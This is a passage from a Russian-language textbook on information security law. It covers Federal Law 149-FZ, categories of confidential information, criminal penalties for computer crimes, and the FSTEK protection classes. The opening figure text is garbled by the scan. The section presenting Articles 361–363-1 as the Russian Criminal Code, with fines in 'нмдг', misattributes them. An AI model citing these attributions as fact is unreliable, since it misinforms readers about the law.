РОДНОГО ИНФОРМАЦИ-
?О правовой
ПРОГРАММ ДЛЯ охране программ
ЭВМ И БАЗ ДАННЫХ” ЗАКОН РФРФ
Закон ИНФОРМАЦИОННОГО
ИНФОРМАЦИОННОГО
ОННОГО ОБМЕНА"
для ЭВМ и баз данных? “О«О
СТАТИСТИЧЕСКОЙ
статистической ОБМЕНА"
ОБМЕНА"
ИНФОРМАЦИИ”
информации»
Рис. 1. Структура законодательной базы информационной без-

опасности России
Конституцией также гарантируется такое важнейшее право, как
право свободно искать, получать, передавать, производить и распро-
странять информацию любым законным способом, при этом в соответ-
ствии со статьей 55. Конституции эти права могут быть ограничены
только федеральным законом и лишь в той мере, в которой это необхо-
димо в целях защиты основ конституционного строя, нравственности,
здоровья, прав и законных интересов других лиц, обеспечения обороны
страны и безопасности государства.
Сочетание этих двух принципов требует жесткой регламентации
вопросов информационной безопасности в законодательстве, прежде
всего, требует определение законных способов поиска, получения, пере-
дачи, производства и распространения информации, а также регламен-
тации вопросов, определяющих отношение информации к той или иной
тайне.
Поэтому, без четких границ, определяющих информацию, как объ-
ект права, применение любых законодательных норм по отношению к
ней - весьма проблематично. До недавнего времени это было довольно
важной причиной, усложняющей регулирование правовых отношений в
20
информационной сфере. Однако, с вступлением в силу Гражданского
кодекса Российской Федерации (I часть), впервые в правовой практике
России законодательно определяется информация как объект права
(ст.128), но не раскрывается само понятия "информация".
Федеральный Закон " Об информации, информационных техно-
логиях и о защите информации" [43], направленный на регулирование
взаимоотношений в информационной сфере, дает разъяснения по этому
вопросу. " Информации (сообщения, данные) независимо от формы их
представления;
Документированная информация (документ) - зафиксированная на
материальном носителе информация с реквизитами, позволяющими ее
идентифицировать".
Этим Законом определено, что информационные ресурсы, то есть
отдельные документы или массивы документов, в том числе и в инфор-
мационных системах, являясь объектом отношений физических, юриди-
ческих лиц и государства, подлежат обязательному учету и защите, как
всякое материальное имущество собственника. При этом, собственнику
предоставляется право самостоятельно, в пределах своей компетенции,
устанавливать режим защиты информационных ресурсов и доступа к
ним.
Российская Федерация и ее субъекты являются собственниками ин-
формационных ресурсов, создаваемых за счет средств федерального
бюджета и бюджетов субъектов Российской Федерации.
Кроме того, закон упоминает и такую информацию, которая пред-
ставляет собой национальное достояние, т.е. такую которую необходимо
защищать.
1.3.1. Цели защиты информации
Основными целями защиты информации Федеральный Закон №

149-ФЗ "Об информации, информационных технологиях и о защите
информации", принятый 27 июля 2006 года, видит: предотвращение
утечки, хищения, искажения, подделки; предотвращение безопасности
личности, общества, государства; предотвращение несанкционирован-
ных действий по уничтожению, искажению, блокированию информа-
ции; защиту конституционных прав граждан на сохранение личной тай-
ны и конфиденциальности персональных данных; сохранение государ-
ственной тайны, конфиденциальности документированной информации.
Государство, владея информацией, представляющей национальное
достояние или содержащей сведения ограниченного доступа, неправо-
21
мерное обращение с которой может нанести ущерб ее собственнику,
изыскивает специальные меры, обеспечивающие контроль ее использо-
вания и качества защиты.
C широким внедрением в повседневную жизнь государственных ор-
ганов сети «Интернет» обострилась проблема обеспечения информаци-
онной безопасности Российской Федерации. В связи с этим были пере-
смотрены вопросы обеспечения информационной безопасности и в 2008
г. был подписан Указ Президента Российской Федерации «О мерах по
обеспечению информационной безопасности российской федерации при
использовании информационно-телекоммуникационных сетей междуна-
родного информационного обмена». В редакции этого Указа от
21.10.2008 N 1510 записано, что подключение информационных систем,
информационно-телекоммуникационных сетей и средств вычислитель-
ной техники, применяемых для хранения, обработки или передачи ин-
формации, содержащей сведения, составляющие государственную тай-
ну, либо информации, обладателями которой являются государственные
органы и которая содержит сведения, составляющие служебную тайну,
к информационно-телекоммуникационным сетям, позволяющим осу-
ществлять передачу информации через государственную границу Рос-
сийской Федерации, в том числе к международной компьютерной сети
"Интернет", не допускается;
Однако, любые директивные ограничения при ее использовании в
эпоху становления экономических отношений - малоэффективны. Кон-
троль за использованием информации в современных условиях проще
всего осуществлять через лицензирование деятельности предприятий и
организаций, работающих с информацией и выполняющих работы по ее
защите. Качество же самих систем, предназначенных для обработки ин-
формации и ее защиты, контролируется через систему обязательной сер-
тификации.
За последнее время появилось достаточно много различных норма-
тивно-правовых актов, регулирующих лицензионную деятельность и
сертификацию продукции в которых не так-то просто разобраться. Не
претендуя на подробные комментарии к законодательству, попробуем
разобраться какие же акты применимы к интересующей нас проблеме, и
как их использовать.
1.4. Категории информации

При разработке законодательных и других правовых и норматив-
ных документов, а также при организации защиты информации важно
22
правильно ориентироваться во всем блоке действующей законодатель-
ной базы в этой области. В 86 федеральных законах, 21 указе и распоря-
жениях Президента Российской Федерации, 119 постановлениях и рас-
поряжениях Правительства Российской Федерации декларированы 32
тайны. При этом заметна тенденция роста числа тайн в Российской Фе-
дерации.
В "Перечне сведений конфиденциального характера", утвержден-
ном Указом Президента РФ от 23.09.2005 N 1111, учтены шесть видов:
1. Сведения о фактах, событиях и обстоятельствах частной жизни
гражданина, позволяющие идентифицировать его личность (персональ-
ные данные), за исключением сведений, подлежащих распространению в
средствах массовой информации в установленных федеральными зако-
нами случаях.
2. Сведения, составляющие тайну следствия и судопроизводства, а
также сведения о защищаемых лицах и мерах государственной защиты,
осуществляемой в соответствии с Федеральным законом от 20 августа
2004 г. N 119-ФЗ "О государственной защите потерпевших, свидетелей и
иных участников уголовного судопроизводства" и другими норматив-
ными правовыми актами Российской Федерации.
3. Служебные сведения, доступ к которым ограничен органами гос-
ударственной власти в соответствии с Гражданским кодексом Россий-
ской Федерации и федеральными законами (служебная тайна).
4. Сведения, связанные с профессиональной деятельностью, доступ
к которым ограничен в соответствии с Конституцией Российской Феде-
рации и федеральными законами (врачебная, нотариальная, адвокатская
тайна, тайна переписки, телефонных переговоров, почтовых отправле-
ний, телеграфных или иных сообщений и так далее).
5. Сведения, связанные с коммерческой деятельностью, доступ к
которым ограничен в соответствии с Гражданским кодексом Российской
Федерации и федеральными законами (коммерческая тайна).
6. Сведения о сущности изобретения, полезной модели или про-
мышленного образца до официальной публикации информации о них.
Как было отмечено выше, базовым законом в области защиты ин-
формации является Федеральный Закон "Об информации, информаци-
онных технологиях и о защите информации", который регламентиру-
ет отношения, возникающие при формировании и использовании ин-
формационных ресурсов Российской Федерации на основе сбора, накоп-
ления, хранения, распространения и предоставления потребителям до-
кументированной информации, а также при создании и использовании
23
информационных технологий, при защите информации и прав субъек-
тов, участвующих в информационных процессах и информатизации.
В соответствие с этим Законом должны быть приведены ранее из-
данные Президентом Российской Федерации и Правительством Россий-
ской Федерации правовые акты, а также все законодательство России
(статья 5 Закона №149-ФЗ).
Закон гласит:
1. Информация может являться объектом публичных, гражданских
и иных правовых отношений. Информация может свободно использо-
ваться любым лицом и передаваться одним лицом другому лицу, если
федеральными законами не установлены ограничения доступа к инфор-
мации либо иные требования к порядку ее предоставления или распро-
странения.
2. Информация в зависимости от категории доступа к ней подразде-
ляется на общедоступную информацию, а также на информацию, доступ
к которой ограничен федеральными законами (информация ограничен-
ного доступа).
3. Информация в зависимости от порядка ее предоставления или
распространения подразделяется на:
1) информацию, свободно распространяемую;
2) информацию, предоставляемую по соглашению лиц, участвую-
щих в соответствующих отношениях;
3) информацию, которая в соответствии с федеральными законами
подлежит предоставлению или распространению;
4) информацию, распространение которой в Российской Федерации
ограничивается или запрещается.
Обязательным является соблюдение конфиденциальности инфор-
мации, доступ к которой ограничен (статья 9, часть 2).
3. Защита информации, составляющей государственную тайну,
осуществляется в соответствии с законодательством Российской Феде-
рации о государственной тайне (статья 9, часть 3).
В положении о порядке обращения со служебной информацией
ограниченного распространения в федеральных органах исполнительной
власти, утвержденном Постановлением Правительства Российской Фе-
дерации от 3 ноября 1994 г. № 1233, дается следующее определение
служебной информации ограниченного распространения. К ней отно-
сится несекретная информация, касающаяся деятельности организаций,
ограничения на распространение которой диктуются служебной необхо-
димостью.
24
ПЕРСОНАЛЬНЫЕ ДАННЫЕ - любая информация, относящаяся к
определенному или определяемому на основании такой информации фи-
зическому лицу (субъекту персональных данных), в том числе его фами-
лия, имя, отчество, год, месяц, дата и место рождения, адрес, семейное,
социальное, имущественное положение, образование, профессия, дохо-
ды, другая информация;
Из этих законодательных актов следует:
информация из любой области знаний и деятельности в принципе
является открытой и общедоступной, если законодательством не преду-
смотрено ограничение доступа к ней в установленном порядке;
категория "КОНФИДЕНЦИАЛЬНАЯ ИНФОРМАЦИЯ", объединяет
все виды защищаемой информации (тайн). Это относится и к государ-
ственным и к негосударственным информационным ресурсам. При этом
исключение составляет информация, отнесенная к государственной
тайне: она к конфиденциальной информации не относится, а является
составной частью информации с ограниченным доступом.
Отнесение информации к категориям осуществляется:
к ГОСУДАРСТВЕННОЙ ТАЙНЕ - в соответствии с Законом Рос-
сийской Федерации "О государственной тайне";
к КОНФИДЕНЦИАЛЬНОЙ ИНФОРМАЦИИ - в порядке, установ-
ленном законодательством РФ;
к ПЕРСОНАЛЬНЫМ ДАННЫМ о гражданах - федеральным зако-
ном.
Изложенное можно проиллюстрировать следующим образом как
представлено на рис. 2.
25
ИНФОРМАЦИОННЫЕ РЕСУРСЫ
Ограниченные к распространению сведения Общедоступная информация
Сведения, содержащие Сведения, содержащие Сведения, которые не могут быть

государственную тайну конфиденциальную информацию конфиденциальными
Личные сведения Служебная

тайна
Персональные Профессиональная Коммерческая

данные тайна тайна
Банковская тайна
Врачебная тайна
Тайна связи
Нотариальная тайна
Адвокатская тайна
Рис. 2. Структура информационных ресурсов в РФ
1.4.1. Режимы защиты информации
В соответствии с "Законом об информации" режим защиты инфор-

мации устанавливается (статья 9, часть 3):
 в отношении сведений, отнесенных к ГОСУДАРСТВЕННОЙ
ТАЙНЕ, - уполномоченными органами на основании Закона Рос-
сийской Федерации "О государственной тайне";
 в отношении конфиденциальной информации - Обладателем ин-
формации или оператором информационной системы;
 в отношении персональных данных - отдельным федеральным за-
коном.
Принципиальным здесь является положение, что режим защиты
конфиденциальной информации определяет ее собственник, то есть со-
ответствующий орган государственной власти или управления, органи-
зация, учреждение, предприятие.
26
Категория "служебная тайна"
Категория "СЛУЖЕБНАЯ ТАЙНА" ранее применялась для обозна-
чения сведений ведомственного характера с грифом "секретно" и за ее
разглашение предусматривалась уголовная ответственность. В настоя-
щее время эта категория из Уголовного кодекса изъята и в прежнем ее
понимании из правового поля исчезла в связи с принятием в июле 1993
года Закона "О государственной тайне" по двум причинам:
во-первых, информация с грифом "секретно" теперь составляет гос-
ударственную тайну;
во-вторых, применение грифов секретности для других категорий ин-
формации не допускается в соответствии со статьей 8 указанного Закона.
Вместе с тем, Гражданским кодексом Российской Федерации, вве-
денным в действие с 1995 года, предусмотрена категория "служебная
тайна" в сочетании с категорией "коммерческая тайна". Статья 139 Ко-
декса гласит:
Информация составляет служебную или коммерческую тайну в
случае, если информация имеет действительную или потенциальную
коммерческую ценность в силу неизвестности ее третьим лицам, к ней
нет свободного доступа на законном основании и обладатель информа-
ции принимает меры к охране ее конфиденциальности.
Информация, составляющая служебную или коммерческую тайну,
защищается способами, предусмотренными настоящим Кодексом и дру-
гими законами.
Из этого следует, что произошло изменение содержания категории
"служебная тайна": с января 1995 года под ней (по аналогии с коммерче-
ской тайной в негосударственных структурах) понимается служебная
информация в государственных структурах, имеющая коммерческую
ценность. В отличие от коммерческой тайны (в коммерческих структу-
рах) защищаемая государством конфиденциальная информация не огра-
ничивается только коммерческой ценностью, поэтому служебная тайна
является составной частью конфиденциальной информации. В государ-
ственных структурах еще может быть информация, имеющая политиче-
скую или иную ценность. Поскольку к служебной тайне она не относит-
ся, ей необходимо присваивать гриф "конфиденциально" или иной гриф
(к примеру, "для служебного пользования", применяемый в органах ис-
полнительной власти и установленный постановлением Правительства
Российской Федерации от 3 ноября 1994 г. N 1233).
Такая трактовка категории "служебная тайна" соответствует проек-
ту Федерального закона "О коммерческой тайне", где предусмотрено
27
при передачи информации с грифом "коммерческая тайна" в государ-
ственные органы охранять ее как служебную тайну (статья 18, часть 1
проекта Закона).
За разглашение служебной тайны уголовная ответственность новым
Уголовным кодексом РФ не предусмотрена, в отличие от коммерческой
тайны (статья 183).
Статьей 16 (часть 4) "Закона об информации" предусмотрен посто-
янный контроль со стороны обладателя информации или оператора ин-
формационной системы за обеспечением уровня защищенности инфор-
мации.
Это означает, что контроль состояния защиты должен охватывать
все три составляющие информации с ограниченным доступом, входящей
в государственные информационные ресурсы:
 информацию, составляющую государственную тайну;
 конфиденциальную информацию;
 персональные данные о гражданах.
При этом, контроль в равной степени должен охватывать и негосу-
дарственные структуры при наличии у них (при передаче им на закон-
ном основании) указанных видов информации, входящих в государ-
ственные информационные ресурсы.
Кроме этого, следует рассмотреть классификацию компьютерных
преступлений согласно УК РФ.
1.5. Классификация компьютерных преступлений

Для тех, кто хочет посмотреть на проблему безопасности со сторо-
ны злоумышленника, следует напомнить, что с 1997 года начали дей-
ствовать новые статьи Уголовного кодекса РФ, где, к сожалению, до-
вольно расплывчато и нечетко описывается возможная уголовная ответ-
ственность за "преступления в сфере компьютерной информации" (глава
28 "Преступления в сфере компьютерной информации"):
Содержание статьи 272 УК РФ:
1. Неправомерный доступ к охраняемой законом компьютерной инфор-
мации, то есть информации на машинном носителе, в электронно-
вычислительной машине (ЭВМ), системе ЭВМ или их сети, если это деяние
повлекло уничтожение, блокирование, модификацию либо копирование ин-
формации, нарушение работы ЭВМ, системы ЭВМ или их сети, -
наказывается штрафом в размере до двухсот тысяч рублей или в раз-
мере заработной платы или иного дохода осужденного за период до восем-
28
надцати месяцев, либо исправительными работами на срок от шести меся-
цев до одного года, либо лишением свободы на срок до двух лет.
(в ред. Федерального закона от 08.12.2003 N 162-ФЗ)
2. То же деяние, совершенное группой лиц по предварительному сгово-
ру или организованной группой либо лицом с использованием своего слу-
жебного положения, а равно имеющим доступ к ЭВМ, системе ЭВМ или их
сети, -
наказывается штрафом в размере от ста тысяч до трехсот тысяч рублей
или в размере заработной платы или иного дохода осужденного за период от
одного года до двух лет, либо исправительными работами на срок от одного
года до двух лет, либо арестом на срок от трех до шести месяцев, либо ли-
шением свободы на срок до пяти лет.
1. Создание программ для ЭВМ или внесение изменений в существую-
щие программы, заведомо приводящих к несанкционированному уничтоже-
нию, блокированию, модификации либо копированию информации, наруше-
нию работы ЭВМ, системы ЭВМ или их сети, а равно использование либо
распространение таких программ или машинных носителей с такими про-
граммами -
наказываются лишением свободы на срок до трех лет со штрафом в
размере до двухсот тысяч рублей или в размере заработной платы или иного
дохода осужденного за период до восемнадцати месяцев.
(в ред. Федерального закона от 08.12.2003 N 162-ФЗ)
2. Те же деяния, повлекшие по неосторожности тяжкие последствия, -
наказываются лишением свободы на срок от трех до семи лет.
1. Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети ли-
цом, имеющим доступ к ЭВМ, системе ЭВМ или их сети, повлекшее уничто-
жение, блокирование или модификацию охраняемой законом информации
ЭВМ, если это деяние причинило существенный вред, -
наказывается лишением права занимать определенные должности или
заниматься определенной деятельностью на срок до пяти лет, либо обяза-
тельными работами на срок от ста восьмидесяти до двухсот сорока часов,
либо ограничением свободы на срок до двух лет.
2. То же деяние, повлекшее по неосторожности тяжкие последствия, -
наказывается лишением свободы на срок до четырех лет.
С 18.01.2005г. в УК РФ введена новая уголовная ответственность за

компьютерные преступления:
Содержание статьи 361 УК РФ.
Несанкционированное вмешательство в работу ЭВМ (компьютеров), ав-
томатизированных систем, компьютерных сетей или сетей электросвязи
(взлом, хакинг)
29
- наказывается штрафом от 600 до 1000 нмдг. или ограничением свобо-
ды на срок от 2 года до 5 лет, или лишением свободы на срок до 3 лет права
занимать определенные должности или заниматься определенной деятель-
ностью на срок до 2 лет или без такого, с конфискацией программных и тех-
нических средств.
Ст. 361 – 1 УК РФ.
Создание с целью использования, распространения или сбыта вредных
программных или технических средств, а также их распространение или сбыт
(вирусы, разведывательные программы)
- наказывается штрафом от 500 до 1000 нмдг. или исправительными
работами на срок до 2 лет, или лишением свободы на тот же срок с конфис-
кацией программных или технических средств.
Ст. 361-2 УК РФ.
Несанкционированные сбыт или распространение информации с огра-
ниченным доступом, которая хранится в ЭВМ (компьютерах), автоматизиро-
ванных системах, компьютерных сетях или на носителях такой информации
(служебные базы данных ГАИ, Налоговой службы и т.д.)- наказывается
штрафом от 500 до 1000 нмдг. или лишение свободы на срок до 2 лет с кон-
фискацией программных или технических средств
Содержание статьи 362 УК РФ
Несанкционированные действия с информацией, обрабатываемой в
ЭВМ (компьютерах), автоматизированных системах, компьютерных сетях или
хранящейся на носителях такой информации, совершенные лицом, имею-
щим право доступа к ней (неразрешенные операции со своей информацией)
- наказывается штрафом от 600 до 1000нмдг. или исправительными ра-
ботами на срок до 2 лет с конфискацией программных или технических
средств.
Содержание статьи 363 УК РФ
Нарушение правил эксплуатации ЭВМ (компьютеров), автоматизиро-
ванных систем, компьютерных сетей или сетей электросвязи или порядка
или правил защиты информации, в них обрабатываемой (снятие защиты)
- наказывается штрафом от 500 до 1000нмдг. или ограничением свобо-
ды на срок до 3 лет с лишением права занимать определенные должности
или заниматься определенной деятельностью на тот же срок.
Ст. 363-1 УК РФ.
Препятствование работе ЭВМ (компьютеров), автоматизированных си-
стем, компьютерных сетей или сетей электросвязи путем массового распро-
странения сообщений электросвязи (спам)
- наказывается штрафом от 500 до 1000нмдг. или ограничением свобо-
ды на срок до 3 лет
30
По своей сути данный закон должен быть направлен именно на зло-
умышленников, однако такое правонарушение, как взлом программного
обеспечения, даже не упоминается. С другой стороны, расплывчатость
формулировок статей закона, в случае их формальной трактовки, позво-
ляет привлечь к уголовной ответственности практически любого про-
граммиста или системного администратора (например, допустившего
ошибку, которая повлекла за собой причинение определенного законом
ущерба). Так что программы теперь лучше вообще не писать.
Если же говорить серьезно, то применение на практике приведен-
ных статей Уголовного кодекса чрезвычайно затруднено. Это связано,
во-первых, со сложной доказуемостью подобных дел и, во-вторых, с
естественным отсутствием у следователей высокой квалификации в
данной области. Поэтому, видимо, пройдет еще не один год, пока мы
дождемся успешного уголовного процесса над преступниками в сфере
компьютерной информации.
1.6. Руководящие документы ФСТЭК России

(Гостехкомиссии России) в области обеспечения
информационной безопасности
В 1992 г. специалисты Гостехкомиссии России разработали и опуб-
ликовали пять руководящих документов, посвященных вопросам защи-
ты информации в автоматизированных системах ее обработки [12-16].
Основой этих документов является концепция защиты средств вычисли-
тельной техники (СВТ) и АС от несанкционированного доступа к ин-
формации, содержащая систему взглядов ФСТЭК России
(Гостехкомиссии России) на проблему информационной безопасности и
основные принципы защиты АС. С точки зрения разработчиков данных
документов, основная задача средств безопасности - это обеспечение
защиты от несанкционированного доступа к информации. Определен-
ный уклон в сторону поддержания секретности информации объясняется
тем, что данные документы были разработаны в расчете на применение
в информационных системах силовых структур РФ. Позже были разра-
ботаны другие руководящие документы ФСТЭК России, расширяющие
сферу применения [36].
Структура требований безопасности
Руководящие документы ФСТЭК России состоят из пяти частей.
1. Защита от несанкционированного доступа к информации.
Термины и определения.
31
2. Концепция защиты СВТ и АС от НСД к информации.
3. Автоматизированные системы. Защита от несанкционирован-
ного доступа к информации. Классификация автоматизиро-
ванных систем и требования по защите информации.
4. Средства вычислительной техники. Защита от несанкциони-
рованного доступа к информации. Показатели защищенности
от НСД к информации.
5. Временное положение по организации разработки, изготовле-
ния и эксплуатации программных и технических средств за-
щиты информации от НСД в автоматизированных системах и
средствах вычислительной техники.
Наибольший интерес представляют вторая, третья и четвертая части.
Во второй части излагается система взглядов, основных принципов,
которые закладываются в основу проблемы защиты информации от
НСД. Руководящие документы ФСТЭК России предлагают две группы
требований к безопасности - показатели защищенности СВТ от НСД и
критерии защищенности АС обработки данных. Первая группа позволя-
ет оценить степень защищенности отдельно поставляемых потребителю
компонентов АС и рассматривается в четвертой части, а вторая рассчи-
тана на более сложные комплексы, включающие несколько единиц СВТ,
и представлена в третье части руководящих документов. Рассмотрим
подробно содержание второй части.
Основные положения концепции защиты СВТ и АС от HCД к ин-
формации
Концепция предназначена для заказчиков, разработчиков и пользо-
вателей СВТ и АС, используемых для обработки, хранения и передачи
требующей защиты информации. Она является методологической базой
нормативно-технических и методических документов, направленных на
решение следующих задач:
 выработка требований по защите СВТ и АС от НСД к информации;
 создание защищенных СВТ и АС, т.е. защищенных от НСД к ин-
формации;
 сертификация защищенных СВТ и АС.
Как уже было сказано выше, концепция предусматривает существо-
вание двух относительно самостоятельных направлений в проблеме за-
щиты информации от НСД: направления, связанного с СВТ, и направле-
ния, связанного с АС. Различие двух направлений порождено тем, что
СВТ разрабатываются и поставляются на рынок лишь как элементы, из
которых в дальнейшем строятся функционально ориентированные АС, и
32
поэтому, не решая прикладных задач, СВТ не содержат пользователь-
ской информации. В случае СВТ можно говорить лишь о защищенности
(защите) СВТ от НСД к информации, для обработки, хранения и переда-
чи которой СВТ предназначено. Примером СВТ можно считать специа-
лизированную плату расширения с соответствующим аппаратным и
программным интерфейсом, реализующую функции аутентификации
пользователя по его биометрическим характеристикам. Или к СВТ мож-
но отнести программу прозрачного шифрования данных, сохраняемых
на жестком диске.
При создании АС появляются такие отсутствующие при разработке
СВТ характеристики АС, как полномочия пользователей, модель нару-
шителя, технология обработки информации. Типичным примером АС
является многопользовательская, многозадачная ОС.
Для определения принципов защиты информации в руководящих
документах ФСТЭК России дается понятие НСД к информации: НСД -
доступ к информации, нарушающий установленные правила разграни-
чения доступа, с использованием штатных средств, предоставляемых
СВТ или АС. В данном определении под штатными средствами понима-
ется совокупность - программного, микропрограммного и технического
обеспечения СВТ или АС.
К основным способам НСД относятся:
 непосредственное несанкционированное обращение к объектам
доступа (например, через получение программой, управляемой
пользователем, доступа на чтение или запись в файл);
 создание программных и технических средств, выполняющих об-
ращение к объектам доступа в обход средств защиты (например,
используя люки, оставленные разработчиками системы защиты);
 модификация средств защиты, позволяющая осуществить НСД
(например, путем внедрения в систему защиты программных за-
кладок или модулей, выполняющих функции "троянского коня");
 внедрение в технические средства СВТ или АС программных или
технических механизмов, нарушающих предполагаемую структу-
ру и функции СВТ или АС и позволяющих осуществись НСД
(например, путем загрузки на компьютер в обход штатной ОС
иной ОС, не имеющей функций защиты).
Далее в руководящих документах ФСТЭК России представлены
семь принципов защиты информации:
33
 защита СВТ и АС основывается на положениях и требованиях су-
ществующих законов, стандартов и нормативно-методических до-
кументов по защите от НСД к информации;
 защита СВТ обеспечивается комплексом программно-технических
средств;
 защита АС обеспечивается комплексом программно-технических,
средств и поддерживающих их организационных мер;
 защита АС должна обеспечиваться на всех технологических эта-
пах обработки информации и во всех режимах функционирования,
в том числе при проведении ремонтных и регламентных работ;
 программно-технические средства защиты не должны существенно
ухудшать основные функциональные характеристики АС (надеж-
ность, быстродействие, возможность изменения конфигурации АС);
 неотъемлемой частью работ по защите является оценка эффектив-
ности средств защиты, осуществляемая по методике, учитываю-
щей всю совокупность технических характеристик оцениваемого
объекта, включая технические решения и практическую реализа-
цию средств защиты;
 защита АС должна предусматривать контроль эффективности
средств защиты от НСД, который либо может быть периодиче-
ским, либо инициироваться по мере необходимости пользователем
АС или контролирующими органами.
Несмотря на то, что угрозы информации могут реализовываться
широким спектром способов, так или иначе изначальным источником
всех угроз является человек или нарушитель. В качестве нарушителя
рассматривается субъект, имеющий доступ к работе со штатными сред-
ствами АС и СВТ и являющийся специалистом высшей квалификации,
знающим все об АС и, в частности, о системе и средствах ее защиты.
В руководящих документах ФСТЭК России дается классификация
нарушителя по уровню возможностей, предоставляемых ему штатными
средствами АС и СВТ. Классификация является иерархической, т.е.
каждый следующий уровень включает в себя функциональные возмож-
ности предыдущего. Выделяется четыре уровня этих возможностей.
Первый уровень определяет самый низкий уровень возможностей
ведения диалога в АС - запуск задач (программ) из фиксированного
набора, реализующих заранее предусмотренные функции по обработке
информации (в качестве примера АС, предоставляющей нарушителю
описанный круг возможностей, можно привести систему обработки
формализованных почтовых сообщений).
34
Второй уровень определяется возможностью создания и запуска
собственных программ с новыми функциями по обработке информации
(например, в данном случае предполагается, что нарушитель может вы-
ступать в роли "обычного" пользователя ОС).
Третий уровень определяется возможностью управления функци-
онированием АС, т.е. воздействием на базовое программное обеспече-
ние системы и на состав и конфигурацию ее оборудования (например, к
данному классу относится нарушитель, внедривший в систему безопас-
ности АС программную закладку).
Четвертый уровень определяется всем объемом возможностей
лиц, осуществляющих проектирование, реализацию и ремонт техниче-
ских средств АС, вплоть до включения в состав СВТ собственных тех-
нических средств с новыми функциями по обработке информации
(например, известны случаи, когда в АС внедрялись "временные бом-
бы", выводящие систему из строя по истечении срока гарантийного ре-
монта).
Кроме перечисленных выше понятий во второй части руководящих
документов ФСТЭК России рассматриваются:
 основные направления обеспечения защиты от НСД, в частности
основные функции средств разграничения доступа (СРД) и обес-
печивающих СРД средств;
 основные характеристики технических средств защиты от НСД;
 порядок организации работ по защите.
Показатели защищенности средств вычислительной техники от

НСД
В части № 2 руководящих документов ФСТЭК России устанавлива-
ется классификация СВТ по уровню защищенности от НСД к информа-
ции на базе перечня показателей защищенности и совокупности описы-
вающих их требований. Под СВТ понимается совокупность программ-
ных и технических элементов систем обработки данных, способных
функционировать самостоятельно или в составе других систем.
Показатели защищенности содержат требования защищенности
СВТ от НСД к информации и применяются к общесистемным про-
граммным средствам и операционным системам (с учетом архитектуры
компьютера). Конкретные перечни показателей определяют классы за-
щищенности СВТ и описываются совокупностью требований. Совокуп-
ность всех средств защиты составляет комплекс средств защиты (КСЗ).
35
Так была установлено семь классов защищенности СВТ от НСД к
информации. Самый низкий класс-седьмой, самый высокий - первый.
Показатели защищенности и требования к классам приведены в табл. 1.
Важно отметить, что требования являются классическим примером
применения необходимых условий оценки качества защиты, т.е. если
какой-либо механизм присутствует, то это является основанием для от-
несения СВТ к некоторому классу.
Интересно, что защищенные СВТ содержат разделение только по
двум классам политик безопасности: дискреционной и мандатной.
Невлияние субъектов друг на друга описывается требованием "изо-
ляция модулей" (требуется с 4-го класса). Гарантии выполнения полити-
ки безопасности коррелированны с требованием "целостность КСЗ"
(требуется с 5-го класса) и "гарантии проектирования" (требуется также
с 5-го класса).
36
Таблица 1
Распределение показателей защищенности по классам средств
вычислительной техники
Класс защищенности
Наименование показателя
6 5 4 3 2 1
Дискреционный принцип контроля до-
+ + + = + =
ступа
Мандатный принцип контроля доступа - - + = = =
Очистка памяти - + + + = =
Изоляция модулей - - + = + =
Маркировка документов - - + = = =
Защита ввода и вывода на отчужденный
- - + = = =
носитель информации
Сопоставление пользователя с устрой-
- - + = = =
ством
Идентификация и аутентификация + = + = = =
Гарантии проектирования - + + + + +
Регистрация - + + + = =
Взаимодействие пользователя с КСЗ - - - + = =
Надежное восстановление - - - + = =
Целостность КСЗ - + + + = =
Контроль модификации - - - - + =
Контроль дистрибуции - - - - + =
Гарантии архитектуры - - - - - +
Тестирование + + + + + =
Руководство пользователя + = = = = =
Руководство по КСЗ + + = + + =
Тестовая документация + + + + + =
Конструкторская (проектная) докумен-
+ + + + + +
тация
Обозначения:
“ - ” - нет требований к данному классу
“ + ” - новые или дополнительные требования
“ = ” - требования совпадают с требованиями к СВТ предыдущего класса
37
1.6.1. Критерии и классы защищенности автоматизированных
систем
В части № З руководящих документов ФСТЭК России дается клас-
сификация АС и требований по защите информации в АС различных
классов. При этом определяются:
1. Основные этапы классификации АС:
 разработка и анализ исходных данных;
 выявление основных признаков АС, необходимых для класси-
фикации;
 сравнение выявленных признаков АС с классифицируемыми;
 присвоение АС соответствующего класса защиты информации
от НСД.
2. Необходимые исходные данные для классификации конкретной
АС:
 перечень защищаемых информационных ресурсов АС и их уро-
вень конфиденциальности;
 перечень лиц, имеющих доступ к штатным средствам АС с ука-
занием их уровня полномочий;
 матрица доступа или полномочий субъектов доступа по отно-
шению к защищаемым информационным ресурсам АС;
 режим обработки данных в АС.
3. Признаки, по которым производится группировка АС в различ-
ные классы:
 наличие в АС информации различного уровня конфиденциаль-
ности;
 уровень полномочий субъектов доступа АС на доступ к конфи-
денциальной информации;
 режим обработки данных в АС: коллективный или индивиду-
альный.
Документы ФСТЭК России устанавливают девять классов защищен-
ности АС от НСД, распределенных по трем группам. Каждый класс ха-
рактеризуется определенной совокупностью требований к средствам за-
щиты. В пределах каждой группы соблюдается иерархия классов защи-
щенности АС. Класс, соответствующий высшей степени защищенности
для данной группы, обозначается индексом Л/А, где Л/-номер группы (от
1 до 3). Следующий класс обозначается Л/Б и т.д.
38
Третья группа включает АС, в которых работает один пользователь,
допущенный ко всей информации АС, размещенной на носителях одно-
го уровня конфиденциальности. Группа содержит два класса - ЗБ и ЗА.
Вторая группа включает АС, в которых пользователи имеют одина-
ковые полномочия доступа ко всей информации, обрабатываемой и хра-
нимой в АС на носителях различного уровня конфиденциальности.
Группа содержит два класса - 2Б и 2А.
Первая группа включает многопользовательские АС, в которых од-
новременно обрабатывается и хранится информация разных уровней
конфиденциальности. Не все пользователи имеют равные права доступа.
Группа содержит пять классов -1Д, 1Г, 1В, 1Б и 1А.
Данная классификация приведена на рис.3.
В табл. 2 приведены требования к подсистемам защиты для каждого
класса защищенности.
Распределение АС по классам защищенности и минимальные тре-
бования для обработки информации ограниченного распространения
приведены на рис.4 и рис. 5.
Третья группа Вторая группа Первая группа

В АС работает один В АС пользователи имеют В многопользовательской
пользователь, допущенный одинаковые права АС одновременно
ко всей информации АС, доступа (полномочия) ко обрабатывается и (или)
размещенной на носителях всей информации АС, хранится информация
одного уровня обрабатываемой и ( или ) разных уровней
конфиденциальности. хранимой на носителях конфиденциальности и не все
различного уровня пользователи имеют право
конфиденциальности доступа ко всей информации
3Б АС
3А 2Б
2А
1Д
1Г
1В
1Б
1А
Рис. 3. Классы защищенности информации в АС
Таблица 2
Требования к классам защищенности автоматизированных систем
Классы
Подсистемы и требования
3Б 3А 2Б 2А 1Д 1Г 1В 1Б 1А
39
Классы
